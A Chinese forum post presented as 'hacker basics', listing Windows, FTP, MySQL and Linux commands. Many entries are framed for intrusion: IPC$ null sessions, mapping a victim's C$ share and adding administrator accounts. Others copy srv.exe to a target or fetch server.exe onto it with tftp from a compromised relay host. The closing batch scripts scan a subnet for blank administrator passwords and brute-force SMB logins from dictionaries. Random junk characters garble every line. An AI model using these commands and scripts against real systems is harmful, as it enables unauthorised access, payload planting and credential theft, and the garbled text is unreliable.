黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
# W& l- f1 N0 X4 r9 e% dnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 : J0 n. k: X  J3 v8 u! h4 T) A
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
! `. I: g1 v6 j3 r& J0 |, y6 \& anet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: ' l1 [2 W  A  c3 t, h% P
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 ; u+ T2 x8 w  K; W" e( F/ E5 b
net use h: /del 删除映射对方到本地的为H:的映射 " `6 O" N# r% d9 @4 a/ v+ I- s
net user 用户名　密码　/add 建立用户 + i% a3 ]) N" W+ `5 g! a5 B/ ]
net user guest /active:yes 激活guest用户 ( q: E: Q7 B0 I. X
net user 查看有哪些用户 : l8 o4 Z7 H/ x  Z' e% }4 G
net user 帐户名 查看帐户的属性   v9 P/ H& u6 q6 E9 u
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
* |5 [( Y$ `1 ~) l9 wnet start 查看开启了哪些服务
4 x/ z; t6 w8 M0 I; r/ R# gnet start 服务名　 开启服务；(如:net start telnet， net start schedule)
6 R, Z! T( [/ w( ^) u. c7 fnet stop 服务名 停止某服务 , t& h# N( {- q" {3 B: K2 \
net time \\目标ip 查看对方时间
" k% Q- U. N8 t0 d6 n  cnet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
9 m+ ~$ v; C( w5 gnet view 查看本地局域网内开启了哪些共享 5 Y: ~5 k9 R7 u* S
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 9 q4 O6 \. k# o' o
net config 显示系统网络设置 - l7 z. e* s  a% K; I
net logoff 断开连接的共享 " E! p) T* F$ n, x
net pause 服务名 暂停某服务
% m/ |% O+ S4 x6 `: K, f. }8 jnet send ip "文本信息" 向对方发信息
. D1 |6 X5 B/ C9 Q+ B# G, z- Enet ver 局域网内正在使用的网络连接类型和信息
' ~8 ^* X$ J! X0 A7 e. ]& Qnet share 查看本地开启的共享 # l$ }; p. K. |- _
net share ipc$ 开启ipc$共享 9 }" a" ~; t& H! c. f5 e7 H- R
net share ipc$ /del 删除ipc$共享 - ~3 z% t/ [/ \: N# I+ o
net share c$ /del 删除C：共享
+ E! W" g6 k& k$ C) h4 V# mnet user guest 12345 用guest用户登陆后用将密码改为12345   p+ ~% G4 d. B5 @8 L" p7 f
net password 密码 更改系统登陆密码
5 W. C9 t" E% J+ V& j' }; A# gnetstat -a 查看开启了哪些端口,常用netstat -an
& G6 ^0 |: J, t, _netstat -n 查看端口的网络连接情况，常用netstat -an " C+ z: B6 O, B" b7 C
netstat -v 查看正在进行的工作 6 L6 L5 b3 x& s
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） / g7 i1 F! d! c; O* S1 |. k
netstat -s 查看正在使用的所有协议使用情况 4 @; a* B  \, T
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 3 A4 q7 B( E) A1 r
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
+ `& E8 _& p3 Q2 qping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 : @5 T' I% ^. p8 w8 u
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) % z+ b. U" M" m' h7 I1 \
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
: M* _3 S0 u( v, @tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) ; Z+ [) I  V2 D: \2 [9 l- j$ ^
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) 3 R2 U% X! R. |: v& u6 Z
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
3 k' J% d1 C+ gdel /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） 5 W9 D4 e8 j; S* W- k1 j' R4 ~
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
6 @+ g. o! i0 z# w5 [  f! mfc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
$ J; q& F* b1 l4 ]' vat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
# i5 o% p2 A- [* y- |* k, T% nat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
7 |; {: P/ J6 s& \+ Jat id号 /delete 停止某个已注册的计划任务
6 F, X( _* Y: R# Wat 查看所有的计划任务 " @8 J$ @- R5 n! n4 q: a4 d3 {/ M0 R
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 # w: M( T! v; ?( Y9 C
finger username @host 查看最近有哪些用户登陆 * D" Z+ \- O% R* \+ Z! v( ?; y+ E
telnet ip 端口 远和登陆服务器,默认端口为23 ( X4 h2 a5 s! q1 ?: B& ?* s
open ip 连接到IP（属telnet登陆后的命令）
! G, b) Q2 a- `3 Z. Mtelnet 在本机上直接键入telnet 将进入本机的telnet 8 Z/ o) a. {% R* M
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 3 L. B, w/ h- |, Q' @% a7 a
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
6 {  _  I& m) A- s( ucppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
- j; v" d, p) J( Hcopy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
* s8 Q: n" q* d2 l8 ^3 u' Bxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
9 g( T/ e. ~7 b# H5 vtftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送   U' z6 Z" u& k, M! G3 n
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
3 v' t$ y- a2 }8 p) i/ K! rftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
$ }, W/ Z# @! o# O# @7 Z- nroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
; m" [$ w' q2 garp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 ) G- b8 T3 [, h! b4 b6 Z: C' ~
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令   J2 C5 }0 w. q2 M
mem 查看cpu使用情况
* N. m* m3 p/ c1 `; `+ ~/ qattrib 文件名(目录名) 查看某文件（目录）的属性
9 t  g7 w4 t' ]  p% Oattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
; S4 s! r1 R& L* r/ q" C  V' gdir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
; @8 D$ j& l( `  p- tdate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
9 F3 ?7 A  `$ B6 Nset 指定环境变量名称=要指派给变量的字符 设置环境变量 5 Y$ x- L) y- D" T
set 显示当前所有的环境变量
% P! [( l2 I; J( j0 ]5 _8 sset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
* o* J/ V. G1 N" vpause 暂停批处理程序，并显示出：请按任意键继续.... 6 Z$ T+ _, a0 H5 z+ {
if 在批处理程序中执行条件处理（更多说明见if命令及变量） 3 s* h9 A" Y6 p5 B% m/ n
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
. f7 D; Y$ Q1 y3 W2 Icall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
- U' {0 l! [' H$ a3 `4 Gfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
5 g& k7 Y$ Y7 }2 lecho on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
" ^" r) l0 W: E1 A8 necho 信息 在屏幕上显示出信息
0 C7 F' V/ E8 y/ k+ r3 pecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中
% `% R2 ^8 E' c" Q, D. u& ^6 B; |findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
8 G/ @' s; E; ~+ q! u  b( vfind 文件名 查找某文件
2 N5 B6 ~! m. o# O- O, a. xtitle 标题名字 更改CMD窗口标题名字
, ?: @9 h3 f9 T) {color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 0 w3 A  C! `0 j8 g* @- D5 z
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
# V6 J' p2 j+ u$ @print 文件名 打印文本文件
+ ?9 X5 ?8 t3 H  f$ o- M5 P8 H6 uver 在DOS窗口下显示版本信息
& T3 l# ~/ y: q- wwinver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
& `* ]* j, [2 }+ j1 @7 ~format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS - ^* e+ f+ ]4 b. m$ k4 J" W
md　目录名 创建目录 / }2 o$ C  o; Z6 e
replace 源文件　要替换文件的目录 替换文件 * |+ l3 ~. _! Q: n( _3 u- x& e# ~
ren 原文件名　新文件名 重命名文件名
7 a# s' o  b4 j. p2 x* e* Itree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 ! g* }7 |& [- a
type 文件名 显示文本文件的内容
$ B1 s4 |" \* R0 r% dmore 文件名 逐屏显示输出文件
& |/ n, X3 T* Odoskey 要锁定的命令＝字符
; W- H8 d& K' p4 Xdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
# q, ~, W- I/ Ttaskmgr 调出任务管理器 & i! ]4 ]* F3 m* G: @! W! ~( S9 K+ u
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
% i& i0 V8 z4 S. \6 t5 }( n: I( x7 Wtlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
' u$ w  M* S/ P, dexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe + H, Z2 R6 e- ^7 l$ L* T1 `
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
3 E( Q- ?1 U/ Tcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
5 I; N$ c  v# U* K" H$ vregedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
" k9 d& j! r& K( ~4 Uregedit /e 注册表文件名 导出注册表
8 P$ o" G9 Y8 x# T6 L" ?3 a# kcacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
9 a# q6 \' r! x5 E2 `cacls 文件名 查看文件的访问用户权限列表 4 F) }9 w' B, q4 a  b7 o
REM 文本内容 在批处理文件中添加注解 / C0 \% K3 M8 c: A, `0 d
netsh 查看或更改本地网络配置情况$ H  A2 N5 A2 M, F7 E, g
IIS服务命令：: l. H7 L4 J5 a1 d
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） ' O' a' Q8 O+ e& _
iisreset /start或stop 启动（停止）所有Internet服务 5 Z! s! S7 _5 k
iisreset /restart 停止然后重新启动所有Internet服务   M8 O/ {  ]+ Y
iisreset /status 显示所有Internet服务状态 9 G3 Y3 R! Y- z, g9 X& E; J
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
- v2 V: y) B% f6 y* J  x7 A9 biisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
' j& q% Y: o2 H( a; Iiisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 5 Z& M" X$ M5 }9 d; Q* A/ B) U" \
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 9 C" c) k0 _# V- h: y/ R( I, y8 N9 c
FTP 命令： (后面有详细说明内容)
1 D! V- f9 Y2 Fftp的命令行格式为:( a8 P1 \+ C% i% C: v5 @
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。8 S- j  Z2 L/ d1 M
－d 使用调试方式。   w4 H  m9 E4 p. w) j7 i
－n 限制ftp的自动登录,即不使用.netrc文件。4 T" C! d$ ?7 ?
－g 取消全局文件名。 & A1 \5 U3 u% }$ C
help [命令] 或 ？[命令] 查看命令说明
( R% F% C/ J1 rbye 或 quit 终止主机FTP进程,并退出FTP管理方式.
0 u+ v) n& a' U$ K* xpwd 列出当前远端主机目录 7 @( W, B9 }0 D8 `
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 " r6 v+ v3 r+ r/ x- ~
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
  r# ^/ B! h: f7 k7 Gmget [remote-files] 从远端主机接收一批文件至本地主机
6 H9 I# Y# c+ P3 E# @mput local-files 将本地主机中一批文件传送至远端主机
) S1 ^" t7 {& U- m. J$ Idir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
/ g7 q& [2 G2 j6 y' }1 ^; pascii 设定以ASCII方式传送文件(缺省值) 3 u  O7 {  O5 q8 E; ~: S5 E
bin 或 image 设定以二进制方式传送文件
& V- P  A: ^3 P" a" n2 {bell 每完成一次文件传送,报警提示
) h, d. t9 F- _) y$ s; s# {cdup 返回上一级目录 , A7 X  B3 R; s. r
close 中断与远程服务器的ftp会话(与open对应)
3 N- g# b0 F( Wopen host[port] 建立指定ftp服务器连接,可指定连接端口
% l+ P7 s, P; k: V4 t7 rdelete 删除远端主机中的文件
+ Q0 `; ]! ~' O! W" fmdelete [remote-files] 删除一批文件 : K. ^7 A2 Y. X+ o1 p& P# f/ J
mkdir directory-name 在远端主机中建立目录 ) D9 O# r; [* Z; a. B5 _
rename [from] [to] 改变远端主机中的文件名 + ]1 V3 w' _; b( ]8 x0 s* T/ E  ~+ ~
rmdir directory-name 删除远端主机中的目录
: Y) O% a  w! b7 L# \status 显示当前FTP的状态 7 s7 Q* E" x# ], a" ~
system 显示远端主机系统类型 / x1 c- s0 A! K4 g0 g0 L: J
user user-name [password] [account] 重新以别的用户名登录远端主机 * [# r& F$ W( F6 I: |5 e
open host [port] 重新建立一个新的连接
' ^* O+ c( f$ W" f7 t; x2 Cprompt 交互提示模式
5 C& m" I+ [% _/ _- }# k7 ~6 B% jmacdef 定义宏命令
! P! I- @) E1 P( wlcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
" b8 m1 j7 I2 @, _8 U' s( s% p3 ~chmod 改变远端主机的文件权限
$ n2 b) P9 F4 k1 Z7 u( z! acase 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
! X! X7 ~7 F% B, r, U5 z3 E2 V9 @cd remote－dir 进入远程主机目录
' v: ?' d* v1 U: Q: wcdup 进入远程主机目录的父目录
. H% f; k6 _& G+ j+ C! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
7 [, }6 _5 V- a& g) N4 d: s7 e. \MYSQL 命令： # n1 s  p" x6 i0 G# s3 V  d
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
- p4 _0 z+ s# U& ?" j（例：mysql -h110.110.110.110 -Uroot -P123456 1 I; p7 ]& r$ s+ i* @. U: u
注:u与root可以不用加空格，其它也一样）
$ i, @1 z7 S" I4 c! O* Rexit 退出MYSQL % Y3 G, m0 A+ \/ f0 }" s- s  A. i. A$ e
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
7 D5 ~9 `2 X1 _; H3 l) W+ jgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
  d+ E" [$ x$ C! n- Y7 I( G0 j! hshow databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
' y" E3 ?" F3 E# T8 G, Buse mysql；
# O/ F; a+ w. G0 G- }: j" c: oshow tables; 显示库中的数据表 ! ]" d2 S9 l# U5 m
describe 表名; 显示数据表的结构
% w0 i0 s7 e, \! ocreate database 库名; 建库   Q) n, O& z9 z
use 库名；0 z7 P) y" F$ ~1 I3 {6 S3 [
create table 表名 (字段设定列表)； 建表
" b. V9 x# _; v* C5 D& {1 m7 Mdrop database 库名; 5 N5 [5 i0 K0 J
drop table 表名； 删库和删表
* q  J, ~( ~& G# X7 }2 u2 h: ~delete from 表名; 将表中记录清空 ! }. K: V/ X$ t% y) B/ P8 X5 x
select * from 表名; 显示表中的记录
) [$ u; E/ ?4 Z6 P0 Hmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 * s2 x# ]( S9 @2 z5 p  [7 L
win2003系统下新增命令（实用部份）：
& x* U" m; O3 Dshutdown /参数 关闭或重启本地或远程主机。- i/ n9 M/ T* B0 u8 D) Z
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
" n5 v# m- k7 b) h3 ?例：shutdown /r /t 0 立即重启本地主机（无延时） 4 ^) _5 N5 a. K* @
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
  @: J- k) Q! W$ T2 q; Q5 \参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。   b" x9 }+ \9 e# }7 ?
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
+ a# N3 e$ O" C( I. e参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
" Y2 }! @5 r( L# t3 n, T  w2 f2 xLinux系统下基本命令： 要区分大小写
1 E* m2 y! C6 Y; v+ S! E& Funame 显示版本信息（同win2K的 ver） ; {* O$ x# J. {9 V% d$ M: H' l
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
5 Y3 ^% J6 h2 L/ A8 R) }pwd 查询当前所在的目录位置 2 Y5 A2 c3 ^3 A% C1 v8 `. k% X
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
6 H0 `7 C' {5 n+ Z% b0 V) Fcat 文件名 查看文件内容 0 ^+ \& G& [3 Z( N  l; i; ?6 O6 l/ E
cat >abc.txt 往abc.txt文件中写上内容。 9 ]6 x! {. w7 x
more 文件名 以一页一页的方式显示一个文本文件。
6 x& i% b' g* ~5 Ncp 复制文件
- }4 V. W! }9 P+ D+ Qmv 移动文件
( S; ]' K+ T8 b% Y- a* u8 i% xrm 文件名 删除文件，rm -a 目录名删除目录及子目录
5 R+ H9 i0 w% O; b- Bmkdir 目录名 建立目录 / R; d6 j. c* V* W0 V8 j
rmdir 删除子目录，目录内没有文档。
# o4 _6 d3 f7 K6 F/ t6 |0 Wchmod 设定档案或目录的存取权限
8 h* N- E$ x' K* M5 wgrep 在档案中查找字符串
1 \3 T( `9 n, c) D: ndiff 档案文件比较
# Q. J+ {! y  z' }find 档案搜寻 8 m# y- k/ v2 t% F
date 现在的日期、时间 ! J6 d" R0 Z3 ~( n4 N5 z: v
who 查询目前和你使用同一台机器的人以及Login时间地点 * H" L' z$ ]' B9 |' R
w 查询目前上机者的详细资料 3 ?5 E4 ]2 s  z& a8 d* S
whoami 查看自己的帐号名称
& t$ V; {. z5 q& D) Pgroups 查看某人的Group
: g( \8 l* P( c2 D$ |! B) P+ wpasswd 更改密码 6 A+ C; H. L5 m7 f
history 查看自己下过的命令
3 I2 ?3 S, d6 e$ g$ `ps 显示进程状态
7 L! U2 m  W& B% `& {, Y- Okill 停止某进程 , h- S' w+ |9 c: i: O7 V1 I1 g
gcc 黑客通常用它来编译C语言写的文件 . p5 k+ D& T# d0 w. [: P" x$ B; X2 o
su 权限转换为指定使用者 - T. H5 b) x& h; M1 h5 l$ t
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 % E; u1 L$ l2 G, D  b4 W- |
ftp ftp连接上某服务器（同win2K0 L# T( E" w# P! b1 g
附：批处理命令与变量
6 O! ^7 I* z# p* J: f, B) E- {1：for命令及变量 基本格式：
- n* g+ H5 k* d% y- ?FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
) ~+ Z% M  {# G( u& k: x批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%34 u9 W7 ]0 R) K/ K8 o
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}' Z" @& n: p% M1 s0 S6 ]0 P8 i
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
) c# e) h9 E* D  B# Q0 [/ L- Bcommand_parameters：为特定命令指定参数或命令行开关
: L# t/ _8 {  E$ s0 {) sIN (set)：指在(set)中取值；DO command ：指执行command' k+ w/ v0 N3 t0 Y: n+ }
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
8 w+ e, w. s8 O" S用法举例： 3 w6 Y3 x7 f/ K
@echo off
7 U4 @" K* ]7 U1 ]1 j& Gecho 用法格式：test.bat *.*.* > test.txt # {. G$ h/ h' L6 b2 j6 Q5 @
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt 7 o& n0 H: d/ @3 {& S0 X
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。6 d. @7 L: b( F1 M3 T
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
6 N& I4 A" H4 R* L@echo off ; B6 W8 u- B- N5 c
echo 用法格式：ok.bat ip 7 }+ \; y3 n8 P+ G1 I6 P
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 7 y7 U" Y% g. D' Y& n( b
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。. l: D* D' W. z- }: e  n: \
2：if命令及变量 基本格式： 0 H8 q1 K' [! g- W
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。+ h7 V/ D  F4 V* l7 O0 U/ x  l5 L
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
! E9 }% O  ]& e7 c. ^) f0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
1 ]0 l  W! o$ h/ W7 R* YIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
% K, p. s' G* a  ~4 n例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
" U. A1 g* @' G$ B4 ~) e4 k' QIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。' {" |% r' `& L, _' b- i
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 " V7 t! Q. n, V( s
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”